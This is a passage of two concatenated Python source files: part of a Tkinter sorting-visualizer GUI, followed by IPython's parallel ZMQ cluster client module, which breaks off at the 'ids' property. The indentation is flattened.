self.algo_menu = OptionMenu(self.frame1, self.algo_var, *self.algorithm, command=self.case_chooser)
self.algo_menu.config(font="calibri", bg="pink", activebackground="sandy brown", cursor="circle")
self.algo_menu["highlightthickness"] = 0
self.algo_menu["padx"] = 20
self.algo_menu["pady"] = 8
self.algo_menu.grid_propagate(0)
# Place for the dropdown menu
self.algo_menu.place(rely=0.1, relx=0.5, anchor=CENTER)
# Creating a frame for new buttons
self.frame_btn1 = Frame(self.frame1, width=230, height=40, bg="light salmon")
self.frame_btn1.grid_propagate(0)
self.frame_btn1.place(relx=0.0, rely=0.17)
# Button for generating new array
self.btn_new = Button(self.frame_btn1, text="Generate", padx=13, pady=3, command=self.new_list, bg="RoyalBlue3", fg="azure", cursor="hand2")
self.btn_new.place(relx=0.15, rely=0)
# Button for shuffling the array
self.btn_shuffle = Button(self.frame_btn1, text="Shuffle", padx=13, pady=3, command=self.shuffle_list, bg="RoyalBlue3", fg="azure", cursor="hand2")
self.btn_shuffle.place(relx=0.60, rely=0)
# Option for bar / color graph
# Creating new frame for it
self.frame_radio = Frame(self.frame1, bg="light salmon", width=230, height=25, relief="flat", bd=4)
self.frame_radio.place(relx=0, rely=0.23)
self.frame_radio.grid_propagate(0)
# Creating the button / option
self.bar_drawing = Radiobutton(self.frame_radio, text="Bar", bg="light salmon", fg="navy", variable=self.graph_type, value=0,
font=("Helvetica", 10, "bold"), command=self.draw_type, cursor="hand2")
self.color_drawing = Radiobutton(self.frame_radio, text="Color", bg="light salmon", fg="navy", variable=self.graph_type,
value=1, font=("Helvetica", 10, "bold"), command=self.draw_type, cursor="hand2")
self.bar_drawing["activebackground"] = "#83A177"
self.color_drawing["activebackground"] = "#83A177"
self.bar_drawing.place(relx=0.25, rely=0)
self.color_drawing.place(relx=0.5, rely=0)
# Creating a frame for a new button
self.frame_btn2 = Frame(self.frame1, width=230, height=40, bg="light salmon")
self.frame_btn2.grid_propagate(0)
self.frame_btn2.place(relx=0.0, rely=0.3)
# Creating a sort button
self.btn_sort = Button(self.frame_btn2, text="Sort", padx=13, pady=3, command=self.sort_list, bg="RoyalBlue3", fg="azure", cursor="hand2")
self.btn_sort.place(relx=0.39, rely=0)
# Slider for changing size of array
self.scale_size = Scale(self.frame1, label="Size :", orient=HORIZONTAL, from_=10, to=200, length=230,
bg="pale goldenrod", troughcolor="#024e76", variable=self.size_var, command=self.change_size,
relief="solid", cursor="hand2")
self.scale_size.place(relx=0.04, rely=0.4)
self.scale_size["highlightthickness"] = 0
# Slider for changing speed of the operations
self.scale_speed = Scale(self.frame1, label="Speed :", orient=HORIZONTAL, from_=1, to=500, length=230,
bg="pale goldenrod", troughcolor="#024e76", variable=self.speed_var, command=self.change_speed, relief="solid", cursor="hand2")
self.scale_speed.place(relx=0.04, rely=0.5)
self.scale_speed["highlightthickness"] = 0
# Label for showing the number of comparisons
self.label_comparison = Label(self.frame1, text=" No. of comparisons: 0", bg="light salmon", fg="midnight blue", font=("Fixedsys", 12))
self.label_comparison.place(relx=0.1, rely=0.65)
# Frame for algorithm info
self.frame_algo_info = Frame(self.frame1, bg="tomato", width=230, height=150, relief="sunken", bd=4)
self.frame_algo_info.grid_propagate(0)
self.frame_algo_info.place(relx=0.03, rely=0.7)
# Label for algorithm info
self.label_avg = Label(self.frame_algo_info, bg="tomato", fg="midnight blue", text=self.information[self.algo_var.get()], font=("comic sans ms", 13, "bold"))
self.label_avg.pack_propagate(0)
self.label_avg.place(relx=0.06, rely=0.25)
# Back button to the main window
self.BackButton = Button(self.frame1, bg="burlywood1", fg="RoyalBlue4", text="< Go Back to main menu", command=self.Back, cursor="hand2")
self.BackButton.grid_propagate(0)
self.BackButton.place(relx=0.2, rely=0.94)
# Canvas for the graph
self.frame2 = Frame(self.root, width=self.CANVAS_X, height=self.CANVAS_Y)
self.frame2.pack(side=LEFT)
self.canva = Canvas(self.frame2, width=self.CANVAS_X, height=self.CANVAS_Y, bg="light goldenrod")
self.canva.pack()
# creating the new array
self.numbers = sample(range(20, self.CANVAS_Y-20), self.size_var.get())
        shuffle(self.numbers)
self.rec_width = self.CANVAS_X // self.size_var.get()
for num in self.numbers:
self.canva.create_rectangle(self.starting_point, self.CANVAS_Y - num, self.starting_point + self.rec_width, self.CANVAS_Y, fill="sandy brown")
self.starting_point += self.rec_width
# Function for back button to main window
def Back(self):
self.root.destroy()
Process = Codes.Start_Threading.START()
Process.start()
# Function for exit
def Close(self):
if messagebox.askokcancel("Exit", "Do you want to exit?"):
self.root.destroy()
quit()
# function for painting the graph
def paint(self, colortype):
# delete the previous graph
self.canva.delete("all")
# start painting from here
self.starting_point = 2
# width of each bar
self.rec_width = self.CANVAS_X / self.size_var.get()
# if bar graph is selected
if self.TYPE == 0:
# paint the array
for i in range(len(self.numbers)):
self.canva.create_rectangle(
self.starting_point, self.CANVAS_Y - self.numbers[i], self.starting_point + self.rec_width, self.CANVAS_Y, fill=colortype[i])
self.starting_point += self.rec_width
# if color graph is selected
else:
# paint the array
for i in range(len(self.numbers)):
hls_color = hls_to_rgb(colortype[i] / 360, 0.6, 1)
red = hls_color[0] * 255
green = hls_color[1] * 255
blue = hls_color[2] * 255
self.canva.create_rectangle(self.starting_point, 0, self.starting_point + self.rec_width, self.CANVAS_Y,
outline="", fill="#%02x%02x%02x" % (int(red), int(green), int(blue)))
self.starting_point += self.rec_width
# update the graph frame
self.frame2.update()
# function for creating new list
def new_list(self):
self.label_comparison.configure(text="No. of comparisons: 0")
# enter random numbers into the new array
self.numbers = sample(range(20, self.CANVAS_Y-20), self.size_var.get())
# shuffle the numbers
        shuffle(self.numbers)
# if bar graph is selected
if self.TYPE == 0:
colortype = ["sandy brown" for x in self.numbers]
# if color graph is selected
else:
colortype = [((int)(x * 360) / self.CANVAS_Y) for x in self.numbers]
# paint the colored array
self.paint(colortype)
# function for shuffling the array
def shuffle_list(self):
shuffle(self.numbers)
        self.label_comparison.configure(text="No. of comparisons: 0")
# if bar graph is selected
if self.TYPE == 0:
colortype = ["sandy brown" for x in self.numbers]
# if color graph is selected
else:
colortype = [((int)(x * 360) / self.CANVAS_Y) for x in self.numbers]
# paint the colored array
self.paint(colortype)
# function for changing the size of the array
def change_size(self, event):
self.label_comparison.configure(text="No. of comparisons: 0")
self.numbers = sample(range(20, self.CANVAS_Y-20), self.size_var.get())
        shuffle(self.numbers)
# if bar graph is selected
if self.TYPE == 0:
colortype = ["sandy brown" for x in self.numbers]
# if color graph is selected
else:
colortype = [((int)(x * 360) / self.CANVAS_Y) for x in self.numbers]
# paint the colored array
self.paint(colortype)
# function for changing the speed of the array
def change_speed(self, event):
pass
# function for sorting the list
def sort_list(self):
self.label_comparison.configure(text="No. of comparisons: 0")
        startsort = Thread(target=algochooser, args=(self.numbers, self.paint, self.label_comparison, self.algo_var.get(), self.TYPE, self.speed_var.get()))
startsort.start()
# function for choosing the sorting algorithm
def case_chooser(self, event):
self.label_avg.pack_forget()
self.label_avg.configure(text=self.information[self.algo_var.get()])
# function for drawing the default random bars/colors
def draw_type(self):
self.TYPE = self.graph_type.get()
if self.TYPE == 0:
colortype = ["sandy brown" for x in self.numbers]
else:
colortype = [((int)(x * 360) / self.CANVAS_Y) for x in self.numbers]
self.paint(colortype)
|
client.py
|
"""A semi-synchronous Client for the ZMQ cluster
Authors:
* MinRK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
import json
import sys
from threading import Thread, Event
import time
import warnings
from datetime import datetime
from getpass import getpass
from pprint import pprint
import collections
pjoin = os.path.join
import zmq
# from zmq.eventloop import ioloop, zmqstream
from IPython.config.configurable import MultipleInstanceError
from IPython.core.application import BaseIPythonApplication
from IPython.core.profiledir import ProfileDir, ProfileDirError
from IPython.utils.coloransi import TermColors
from IPython.utils.jsonutil import rekey
from IPython.utils.localinterfaces import LOCALHOST, LOCAL_IPS
from IPython.utils.path import get_ipython_dir
from IPython.utils.py3compat import cast_bytes
from IPython.utils.traitlets import (HasTraits, Integer, Instance, Unicode,
Dict, List, Bool, Set, Any)
from IPython.external.decorator import decorator
from IPython.external.ssh import tunnel
from IPython.parallel import Reference
from IPython.parallel import error
from IPython.parallel import util
from IPython.kernel.zmq.session import Session, Message
from IPython.kernel.zmq import serialize
from .asyncresult import AsyncResult, AsyncHubResult
from .view import DirectView, LoadBalancedView
if sys.version_info[0] >= 3:
# xrange is used in a couple 'isinstance' tests in py2
# should be just 'range' in 3k
xrange = range
#--------------------------------------------------------------------------
# Decorators for Client methods
#--------------------------------------------------------------------------
@decorator
def spin_first(f, self, *args, **kwargs):
"""Call spin() to sync state prior to calling the method."""
self.spin()
return f(self, *args, **kwargs)
#--------------------------------------------------------------------------
# Classes
#--------------------------------------------------------------------------
class ExecuteReply(object):
"""wrapper for finished Execute results"""
def __init__(self, msg_id, content, metadata):
self.msg_id = msg_id
self._content = content
self.execution_count = content['execution_count']
self.metadata = metadata
def __getitem__(self, key):
return self.metadata[key]
def __getattr__(self, key):
if key not in self.metadata:
raise AttributeError(key)
return self.metadata[key]
def __repr__(self):
pyout = self.metadata['pyout'] or {'data':{}}
text_out = pyout['data'].get('text/plain', '')
if len(text_out) > 32:
text_out = text_out[:29] + '...'
return "<ExecuteReply[%i]: %s>" % (self.execution_count, text_out)
def _repr_pretty_(self, p, cycle):
pyout = self.metadata['pyout'] or {'data':{}}
text_out = pyout['data'].get('text/plain', '')
if not text_out:
return
try:
ip = get_ipython()
except NameError:
colors = "NoColor"
else:
colors = ip.colors
if colors == "NoColor":
out = normal = ""
else:
out = TermColors.Red
normal = TermColors.Normal
if '\n' in text_out and not text_out.startswith('\n'):
# add newline for multiline reprs
text_out = '\n' + text_out
p.text(
out + 'Out[%i:%i]: ' % (
self.metadata['engine_id'], self.execution_count
) + normal + text_out
)
def _repr_html_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("text/html")
def _repr_latex_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("text/latex")
def _repr_json_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("application/json")
def _repr_javascript_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("application/javascript")
def _repr_png_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/png")
def _repr_jpeg_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/jpeg")
def _repr_svg_(self):
pyout = self.metadata['pyout'] or {'data':{}}
return pyout['data'].get("image/svg+xml")
class Metadata(dict):
"""Subclass of dict for initializing metadata values.
Attribute access works on keys.
These objects have a strict set of keys - errors will raise if you try
to add new keys.
"""
def __init__(self, *args, **kwargs):
dict.__init__(self)
md = {'msg_id' : None,
'submitted' : None,
'started' : None,
'completed' : None,
'received' : None,
'engine_uuid' : None,
'engine_id' : None,
'follow' : None,
'after' : None,
'status' : None,
'pyin' : None,
'pyout' : None,
'pyerr' : None,
'stdout' : '',
'stderr' : '',
'outputs' : [],
'data': {},
'outputs_ready' : False,
}
self.update(md)
self.update(dict(*args, **kwargs))
def __getattr__(self, key):
"""getattr aliased to getitem"""
if key in iter(self.keys()):
return self[key]
else:
raise AttributeError(key)
def __setattr__(self, key, value):
"""setattr aliased to setitem, with strict"""
if key in iter(self.keys()):
self[key] = value
else:
raise AttributeError(key)
def __setitem__(self, key, value):
"""strict static key enforcement"""
if key in iter(self.keys()):
dict.__setitem__(self, key, value)
else:
raise KeyError(key)
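# Example of the strict-key behaviour (hypothetical values):
#   md = Metadata()
#   md.status          # None -- attribute access reads existing keys
#   md['stdout'] = ''  # fine, key already exists
#   md['bogus'] = 1    # raises KeyError: new keys cannot be added via item assignment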
class Client(HasTraits):
"""A semi-synchronous client to the IPython ZMQ cluster
Parameters
----------
url_file : str/unicode; path to ipcontroller-client.json
This JSON file should contain all the information needed to connect to a cluster,
and is likely the only argument needed.
Connection information for the Hub's registration. If a json connector
file is given, then likely no further configuration is necessary.
[Default: use profile]
profile : bytes
The name of the Cluster profile to be used to find connector information.
If run from an IPython application, the default profile will be the same
as the running application, otherwise it will be 'default'.
cluster_id : str
        String id to be added to runtime files, to prevent name collisions when using
multiple clusters with a single profile simultaneously.
When set, will look for files named like: 'ipcontroller-<cluster_id>-client.json'
Since this is text inserted into filenames, typical recommendations apply:
Simple character strings are ideal, and spaces are not recommended (but
should generally work)
context : zmq.Context
Pass an existing zmq.Context instance, otherwise the client will create its own.
debug : bool
flag for lots of message printing for debug purposes
timeout : int/float
time (in seconds) to wait for connection replies from the Hub
[Default: 10]
#-------------- session related args ----------------
config : Config object
If specified, this will be relayed to the Session for configuration
username : str
set username for the session object
#-------------- ssh related args ----------------
# These are args for configuring the ssh tunnel to be used
# credentials are used to forward connections over ssh to the Controller
# Note that the ip given in `addr` needs to be relative to sshserver
# The most basic case is to leave addr as pointing to localhost (127.0.0.1),
# and set sshserver as the same machine the Controller is on. However,
# the only requirement is that sshserver is able to see the Controller
# (i.e. is within the same trusted network).
sshserver : str
A string of the form passed to ssh, i.e. 'server.tld' or 'user@server.tld:port'
If keyfile or password is specified, and this is not, it will default to
the ip given in addr.
sshkey : str; path to ssh private key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str
Your ssh password to sshserver. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
paramiko : bool
flag for whether to use paramiko instead of shell ssh for tunneling.
[default: True on win32, False else]
Attributes
----------
ids : list of int engine IDs
requesting the ids attribute always synchronizes
the registration state. To request ids without synchronization,
use semi-private _ids attributes.
history : list of msg_ids
a list of msg_ids, keeping track of all the execution
messages you have submitted in order.
outstanding : set of msg_ids
a set of msg_ids that have been submitted, but whose
results have not yet been received.
results : dict
a dict of all our results, keyed by msg_id
block : bool
determines default behavior when block not specified
in execution methods
Methods
-------
spin
flushes incoming results and registration state changes
control methods spin, and requesting `ids` also ensures up to date
wait
wait on one or more msg_ids
execution methods
apply
legacy: execute, run
data movement
push, pull, scatter, gather
query methods
queue_status, get_result, purge, result_status
control methods
abort, shutdown
"""
block = Bool(False)
outstanding = Set()
results = Instance('collections.defaultdict', (dict,))
metadata = Instance('collections.defaultdict', (Metadata,))
history = List()
debug = Bool(False)
_spin_thread = Any()
_stop_spinning = Any()
profile=Unicode()
def _profile_default(self):
if BaseIPythonApplication.initialized():
# an IPython app *might* be running, try to get its profile
try:
return BaseIPythonApplication.instance().profile
except (AttributeError, MultipleInstanceError):
# could be a *different* subclass of config.Application,
# which would raise one of these two errors.
return 'default'
else:
return 'default'
_outstanding_dict = Instance('collections.defaultdict', (set,))
_ids = List()
_connected=Bool(False)
_ssh=Bool(False)
_context = Instance('zmq.Context')
_config = Dict()
_engines=Instance(util.ReverseDict, (), {})
# _hub_socket=Instance('zmq.Socket')
_query_socket=Instance('zmq.Socket')
_control_socket=Instance('zmq.Socket')
_iopub_socket=Instance('zmq.Socket')
_notification_socket=Instance('zmq.Socket')
_mux_socket=Instance('zmq.Socket')
_task_socket=Instance('zmq.Socket')
_task_scheme=Unicode()
_closed = False
_ignored_control_replies=Integer(0)
_ignored_hub_replies=Integer(0)
def __new__(self, *args, **kw):
# don't raise on positional args
return HasTraits.__new__(self, **kw)
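    # A minimal connection sketch (hypothetical profile/engine setup):
    #   from IPython.parallel import Client
    #   rc = Client(profile='default')   # reads ipcontroller-client.json for that profile
    #   dview = rc[:]                    # DirectView on all currently registered engines
    #   dview.apply_sync(lambda x: x * 2, 21)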
def __init__(self, url_file=None, profile=None, profile_dir=None, ipython_dir=None,
context=None, debug=False,
sshserver=None, sshkey=None, password=None, paramiko=None,
timeout=10, cluster_id=None, **extra_args
):
if profile:
super(Client, self).__init__(debug=debug, profile=profile)
else:
super(Client, self).__init__(debug=debug)
if context is None:
context = zmq.Context.instance()
self._context = context
self._stop_spinning = Event()
if 'url_or_file' in extra_args:
url_file = extra_args['url_or_file']
warnings.warn("url_or_file arg no longer supported, use url_file", DeprecationWarning)
if url_file and util.is_url(url_file):
raise ValueError("single urls cannot be specified, url-files must be used.")
self._setup_profile_dir(self.profile, profile_dir, ipython_dir)
if self._cd is not None:
if url_file is None:
if not cluster_id:
client_json = 'ipcontroller-client.json'
else:
client_json = 'ipcontroller-%s-client.json' % cluster_id
url_file = pjoin(self._cd.security_dir, client_json)
if url_file is None:
raise ValueError(
"I can't find enough information to connect to a hub!"
" Please specify at least one of url_file or profile."
)
with open(url_file) as f:
cfg = json.load(f)
self._task_scheme = cfg['task_scheme']
# sync defaults from args, json:
if sshserver:
cfg['ssh'] = sshserver
location = cfg.setdefault('location', None)
proto,addr = cfg['interface'].split('://')
addr = util.disambiguate_ip_address(addr, location)
cfg['interface'] = "%s://%s" % (proto, addr)
# turn interface,port into full urls:
for key in ('control', 'task', 'mux', 'iopub', 'notification', 'registration'):
cfg[key] = cfg['interface'] + ':%i' % cfg[key]
url = cfg['registration']
if location is not None and addr == LOCALHOST:
# location specified, and connection is expected to be local
if location not in LOCAL_IPS and not sshserver:
# load ssh from JSON *only* if the controller is not on
# this machine
sshserver=cfg['ssh']
if location not in LOCAL_IPS and not sshserver:
# warn if no ssh specified, but SSH is probably needed
# This is only a warning, because the most likely cause
# is a local Controller on a laptop whose IP is dynamic
warnings.warn("""
Controller appears to be listening on localhost, but not on this machine.
If this is true, you should specify Client(...,sshserver='you@%s')
or instruct your controller to listen on an external IP."""%location,
RuntimeWarning)
elif not sshserver:
# otherwise sync with cfg
sshserver = cfg['ssh']
self._config = cfg
self._ssh = bool(sshserver or sshkey or password)
if self._ssh and sshserver is None:
# default to ssh via localhost
sshserver = addr
if self._ssh and password is None:
if tunnel.try_passwordless_ssh(sshserver, sshkey, paramiko):
password=False
else:
password = getpass("SSH Password for %s: "%sshserver)
ssh_kwargs = dict(keyfile=sshkey, password=password, paramiko=paramiko)
# configure and construct the session
try:
extra_args['packer'] = cfg['pack']
extra_args['unpacker'] = cfg['unpack']
extra_args['key'] = cast_bytes(cfg['key'])
extra_args['signature_scheme'] = cfg['signature_scheme']
except KeyError as exc:
msg = '\n'.join([
"Connection file is invalid (missing '{}'), possibly from an old version of IPython.",
"If you are reusing connection files, remove them and start ipcontroller again."
])
raise ValueError(msg.format(exc.message))
self.session = Session(**extra_args)
self._query_socket = self._context.socket(zmq.DEALER)
if self._ssh:
tunnel.tunnel_connection(self._query_socket, cfg['registration'], sshserver, **ssh_kwargs)
else:
self._query_socket.connect(cfg['registration'])
self.session.debug = self.debug
self._notification_handlers = {'registration_notification' : self._register_engine,
'unregistration_notification' : self._unregister_engine,
'shutdown_notification' : lambda msg: self.close(),
}
self._queue_handlers = {'execute_reply' : self._handle_execute_reply,
'apply_reply' : self._handle_apply_reply}
try:
self._connect(sshserver, ssh_kwargs, timeout)
except:
self.close(linger=0)
raise
# last step: setup magics, if we are in IPython:
try:
ip = get_ipython()
except NameError:
return
else:
if 'px' not in ip.magics_manager.magics:
# in IPython but we are the first Client.
# activate a default view for parallel magics.
self.activate()
def __del__(self):
"""cleanup sockets, but _not_ context."""
self.close()
def _setup_profile_dir(self, profile, profile_dir, ipython_dir):
if ipython_dir is None:
ipython_dir = get_ipython_dir()
if profile_dir is not None:
try:
self._cd = ProfileDir.find_profile_dir(profile_dir)
return
except ProfileDirError:
pass
elif profile is not None:
try:
self._cd = ProfileDir.find_profile_dir_by_name(
ipython_dir, profile)
return
except ProfileDirError:
pass
self._cd = None
def _update_engines(self, engines):
"""Update our engines dict and _ids from a dict of the form: {id:uuid}."""
for k,v in engines.items():
eid = int(k)
if eid not in self._engines:
self._ids.append(eid)
self._engines[eid] = v
self._ids = sorted(self._ids)
if sorted(self._engines.keys()) != list(range(len(self._engines))) and \
self._task_scheme == 'pure' and self._task_socket:
self._stop_scheduling_tasks()
def _stop_scheduling_tasks(self):
"""Stop scheduling tasks because an engine has been unregistered
from a pure ZMQ scheduler.
"""
self._task_socket.close()
self._task_socket = None
msg = "An engine has been unregistered, and we are using pure " +\
"ZMQ task scheduling. Task farming will be disabled."
if self.outstanding:
msg += " If you were running tasks when this happened, " +\
"some `outstanding` msg_ids may never resolve."
warnings.warn(msg, RuntimeWarning)
def _build_targets(self, targets):
"""Turn valid target IDs or 'all' into two lists:
(int_ids, uuids).
"""
if not self._ids:
# flush notification socket if no engines yet, just in case
if not self.ids:
raise error.NoEnginesRegistered("Can't build targets without any engines")
if targets is None:
targets = self._ids
elif isinstance(targets, str):
if targets.lower() == 'all':
targets = self._ids
else:
raise TypeError("%r not valid str target, must be 'all'"%(targets))
elif isinstance(targets, int):
if targets < 0:
targets = self.ids[targets]
if targets not in self._ids:
raise IndexError("No such engine: %i"%targets)
targets = [targets]
if isinstance(targets, slice):
indices = list(range(len(self._ids)))[targets]
ids = self.ids
targets = [ ids[i] for i in indices ]
if not isinstance(targets, (tuple, list, xrange)):
raise TypeError("targets by int/slice/collection of ints only, not %s"%(type(targets)))
return [cast_bytes(self._engines[t]) for t in targets], list(targets)
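    # Examples of accepted target specs (hypothetical engine ids 0..3):
    #   _build_targets(None)         -> every registered engine
    #   _build_targets('all')        -> every registered engine
    #   _build_targets(2)            -> engine 2 only
    #   _build_targets(slice(0, 2))  -> engines 0 and 1
    # Each call returns (engine uuids as bytes, engine ids as ints).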
def _connect(self, sshserver, ssh_kwargs, timeout):
"""setup all our socket connections to the cluster. This is called from
__init__."""
# Maybe allow reconnecting?
if self._connected:
return
self._connected=True
def connect_socket(s, url):
if self._ssh:
return tunnel.tunnel_connection(s, url, sshserver, **ssh_kwargs)
else:
return s.connect(url)
self.session.send(self._query_socket, 'connection_request')
# use Poller because zmq.select has wrong units in pyzmq 2.1.7
poller = zmq.Poller()
poller.register(self._query_socket, zmq.POLLIN)
# poll expects milliseconds, timeout is seconds
evts = poller.poll(timeout*1000)
if not evts:
raise error.TimeoutError("Hub connection request timed out")
idents,msg = self.session.recv(self._query_socket,mode=0)
if self.debug:
pprint(msg)
content = msg['content']
# self._config['registration'] = dict(content)
cfg = self._config
if content['status'] == 'ok':
self._mux_socket = self._context.socket(zmq.DEALER)
connect_socket(self._mux_socket, cfg['mux'])
self._task_socket = self._context.socket(zmq.DEALER)
connect_socket(self._task_socket, cfg['task'])
self._notification_socket = self._context.socket(zmq.SUB)
self._notification_socket.setsockopt(zmq.SUBSCRIBE, b'')
connect_socket(self._notification_socket, cfg['notification'])
self._control_socket = self._context.socket(zmq.DEALER)
connect_socket(self._control_socket, cfg['control'])
self._iopub_socket = self._context.socket(zmq.SUB)
self._iopub_socket.setsockopt(zmq.SUBSCRIBE, b'')
connect_socket(self._iopub_socket, cfg['iopub'])
self._update_engines(dict(content['engines']))
else:
self._connected = False
raise Exception("Failed to connect!")
#--------------------------------------------------------------------------
# handlers and callbacks for incoming messages
#--------------------------------------------------------------------------
def _unwrap_exception(self, content):
"""unwrap exception, and remap engine_id to int."""
e = error.unwrap_exception(content)
# print e.traceback
if e.engine_info:
e_uuid = e.engine_info['engine_uuid']
eid = self._engines[e_uuid]
e.engine_info['engine_id'] = eid
return e
def _extract_metadata(self, msg):
header = msg['header']
parent = msg['parent_header']
msg_meta = msg['metadata']
content = msg['content']
md = {'msg_id' : parent['msg_id'],
'received' : datetime.now(),
'engine_uuid' : msg_meta.get('engine', None),
'follow' : msg_meta.get('follow', []),
'after' : msg_meta.get('after', []),
'status' : content['status'],
}
if md['engine_uuid'] is not None:
md['engine_id'] = self._engines.get(md['engine_uuid'], None)
if 'date' in parent:
md['submitted'] = parent['date']
if 'started' in msg_meta:
md['started'] = msg_meta['started']
if 'date' in header:
md['completed'] = header['date']
return md
def _register_engine(self, msg):
"""Register a new engine, and update our connection info."""
content = msg['content']
eid = content['id']
d = {eid : content['uuid']}
self._update_engines(d)
def _unregister_engine(self, msg):
"""Unregister an engine that has died."""
content = msg['content']
eid = int(content['id'])
if eid in self._ids:
self._ids.remove(eid)
uuid = self._engines.pop(eid)
self._handle_stranded_msgs(eid, uuid)
if self._task_socket and self._task_scheme == 'pure':
self._stop_scheduling_tasks()
def _handle_stranded_msgs(self, eid, uuid):
"""Handle messages known to be on an engine when the engine unregisters.
It is possible that this will fire prematurely - that is, an engine will
go down after completing a result, and the client will be notified
of the unregistration and later receive the successful result.
"""
outstanding = self._outstanding_dict[uuid]
for msg_id in list(outstanding):
if msg_id in self.results:
# we already have this result
continue
try:
raise error.EngineError("Engine %r died while running task %r"%(eid, msg_id))
except:
content = error.wrap_exception()
# build a fake message:
msg = self.session.msg('apply_reply', content=content)
msg['parent_header']['msg_id'] = msg_id
msg['metadata']['engine'] = uuid
self._handle_apply_reply(msg)
def _handle_execute_reply(self, msg):
"""Save the reply to an execute_request into our results.
execute messages are never actually used. apply is used instead.
"""
parent = msg['parent_header']
msg_id = parent['msg_id']
if msg_id not in self.outstanding:
if msg_id in self.history:
print(("got stale result: %s"%msg_id))
else:
print(("got unknown result: %s"%msg_id))
else:
self.outstanding.remove(msg_id)
content = msg['content']
header = msg['header']
# construct metadata:
md = self.metadata[msg_id]
md.update(self._extract_metadata(msg))
# is this redundant?
self.metadata[msg_id] = md
e_outstanding = self._outstanding_dict[md['engine_uuid']]
if msg_id in e_outstanding:
e_outstanding.remove(msg_id)
# construct result:
if content['status'] == 'ok':
self.results[msg_id] = ExecuteReply(msg_id, content, md)
elif content['status'] == 'aborted':
self.results[msg_id] = error.TaskAborted(msg_id)
elif content['status'] == 'resubmitted':
# TODO: handle resubmission
pass
else:
self.results[msg_id] = self._unwrap_exception(content)
def _handle_apply_reply(self, msg):
"""Save the reply to an apply_request into our results."""
parent = msg['parent_header']
msg_id = parent['msg_id']
if msg_id not in self.outstanding:
if msg_id in self.history:
print(("got stale result: %s"%msg_id))
print(self.results[msg_id])
print(msg)
else:
print(("got unknown result: %s"%msg_id))
else:
self.outstanding.remove(msg_id)
content = msg['content']
header = msg['header']
# construct metadata:
md = self.metadata[msg_id]
md.update(self._extract_metadata(msg))
# is this redundant?
self.metadata[msg_id] = md
e_outstanding = self._outstanding_dict[md['engine_uuid']]
if msg_id in e_outstanding:
e_outstanding.remove(msg_id)
# construct result:
if content['status'] == 'ok':
self.results[msg_id] = serialize.unserialize_object(msg['buffers'])[0]
elif content['status'] == 'aborted':
self.results[msg_id] = error.TaskAborted(msg_id)
elif content['status'] == 'resubmitted':
# TODO: handle resubmission
pass
else:
self.results[msg_id] = self._unwrap_exception(content)
def _flush_notifications(self):
"""Flush notifications of engine registrations waiting
in ZMQ queue."""
idents,msg = self.session.recv(self._notification_socket, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
msg_type = msg['header']['msg_type']
handler = self._notification_handlers.get(msg_type, None)
if handler is None:
raise Exception("Unhandled message type: %s" % msg_type)
else:
handler(msg)
idents,msg = self.session.recv(self._notification_socket, mode=zmq.NOBLOCK)
def _flush_results(self, sock):
"""Flush task or queue results waiting in ZMQ queue."""
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
msg_type = msg['header']['msg_type']
handler = self._queue_handlers.get(msg_type, None)
if handler is None:
raise Exception("Unhandled message type: %s" % msg_type)
else:
handler(msg)
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
def _flush_control(self, sock):
"""Flush replies from the control channel waiting
in the ZMQ queue.
Currently: ignore them."""
if self._ignored_control_replies <= 0:
return
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
self._ignored_control_replies -= 1
if self.debug:
pprint(msg)
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
def _flush_ignored_control(self):
"""flush ignored control replies"""
while self._ignored_control_replies > 0:
self.session.recv(self._control_socket)
self._ignored_control_replies -= 1
def _flush_ignored_hub_replies(self):
ident,msg = self.session.recv(self._query_socket, mode=zmq.NOBLOCK)
while msg is not None:
ident,msg = self.session.recv(self._query_socket, mode=zmq.NOBLOCK)
def _flush_iopub(self, sock):
"""Flush replies from the iopub channel waiting
in the ZMQ queue.
"""
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
while msg is not None:
if self.debug:
pprint(msg)
parent = msg['parent_header']
# ignore IOPub messages with no parent.
# Caused by print statements or warnings from before the first execution.
if not parent:
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
continue
msg_id = parent['msg_id']
content = msg['content']
header = msg['header']
msg_type = msg['header']['msg_type']
# init metadata:
md = self.metadata[msg_id]
if msg_type == 'stream':
name = content['name']
s = md[name] or ''
md[name] = s + content['data']
elif msg_type == 'pyerr':
md.update({'pyerr' : self._unwrap_exception(content)})
elif msg_type == 'pyin':
md.update({'pyin' : content['code']})
elif msg_type == 'display_data':
md['outputs'].append(content)
elif msg_type == 'pyout':
md['pyout'] = content
elif msg_type == 'data_message':
data, remainder = serialize.unserialize_object(msg['buffers'])
md['data'].update(data)
elif msg_type == 'status':
# idle message comes after all outputs
if content['execution_state'] == 'idle':
md['outputs_ready'] = True
else:
# any other msg_type is ignored
pass
# redundant?
self.metadata[msg_id] = md
idents,msg = self.session.recv(sock, mode=zmq.NOBLOCK)
#--------------------------------------------------------------------------
# len, getitem
#--------------------------------------------------------------------------
def __len__(self):
"""len(client) returns # of engines."""
return len(self.ids)
def __getitem__(self, key):
"""index access returns DirectView multiplexer objects
Must be int, slice, or list/tuple/xrange of ints"""
if not isinstance(key, (int, slice, tuple, list, xrange)):
raise TypeError("key by int/slice/iterable of ints only, not %s"%(type(key)))
else:
return self.direct_view(key)
#--------------------------------------------------------------------------
# Begin public methods
#--------------------------------------------------------------------------
@property
def ids(self):
